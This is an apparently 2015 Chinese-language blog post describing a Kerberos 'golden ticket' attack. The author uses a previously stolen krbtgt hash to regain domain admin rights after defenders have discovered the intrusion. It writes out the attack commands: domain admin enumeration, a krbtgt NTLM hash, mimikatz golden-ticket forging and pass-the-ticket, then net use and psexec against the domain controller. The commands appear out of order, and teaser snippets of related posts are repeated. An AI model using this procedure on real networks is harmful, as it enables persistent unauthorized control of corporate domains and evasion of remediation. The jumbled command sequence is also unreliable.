mickey
· 2015/10/13 11:33
最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的<>
,發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有龍哥翻譯的(不知道還有什麼新方法,心中還有激情,如果想交流的朋友,可以加我聊聊。
我原來發過乙個微薄說
這就是我說的金之鑰匙,利用這個的條件是你在原來搞定域控的時候,已經匯出過域使用者的hash,尤其是krbtgt 這個使用者的。但是在你在內網幹其他事情的時候,活兒不細,被人家發現了,你擁有的域管理員許可權掉了,你現在還有乙個普通的域使用者許可權,管理員做加固的時候又忘記修改krbtgt密碼了(很常見),我們還是能重新回來,步驟如下:
要重新拿迴域管理員許可權,首先要先知道域內的管理員有誰
c:\users\hydra>net group "domain admins" /domain
我這裡的實驗環境,通過截圖可以看到域管理員是administrator
我還要知道域sid是啥
c:\users\hydra>whoami /user
我的域sid是s-1-5-21-3883552807-251258116-2724407435
還有最重要的krbtgt使用者的ntlm雜湊,我原來匯出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然後該用神器mimikatz出場了,依次執行
mimikatz # kerberos::purge到現在,我們又重新擁有域管理員許可權了,可以驗證下mimikatz # kerberos::golden /admin:administrator /domain:pentstlab.com /sid:s-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:administrator.kiribi
mimikatz # kerberos::ptt administrator.kiribi
mimikatz # kerberos::tgt
e:\>net use \\win-0dkn2as0t2g\c$呃,感覺這個方法比這個方便些,文章寫了好久了,一直湊不出更多的字數,就沒發。。嗯。。。懶了。。e:\>p***ec.exe \\win-0dkn2as0t2g cmd
收藏 分享
域滲透的金之鑰匙
0x00 廢話連篇 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,還有龍哥翻譯的 不知道還有什麼新...
域滲透的金之鑰匙
0x00 廢話連篇 最近幾年很少搞內網滲透了,這幾年發展的快啊,看了a牛翻譯的 發現趨勢都是powershell指令碼化了。想當年遇到的域控都是windows 2003的,找朋友要些vbscript指令碼自動化,然後那啥那啥的。現在搞域除了前段時間出的ms14068,不知道還有什麼新方法,心中還有激...
域滲透之金票據學習
金票據 golden ticket 偽造票據授予票據 tgt 也被稱為認證票據。krbtgt賬戶 每個域控制器都有乙個 krbtgt 的使用者賬戶,是kdc的服務賬戶,用來建立票據授予服務 tgs 加密的金鑰。與其說是一種攻擊方式,不如說是一種後門,當域控許可權掉後,再重新獲取許可權。環境域控2k3...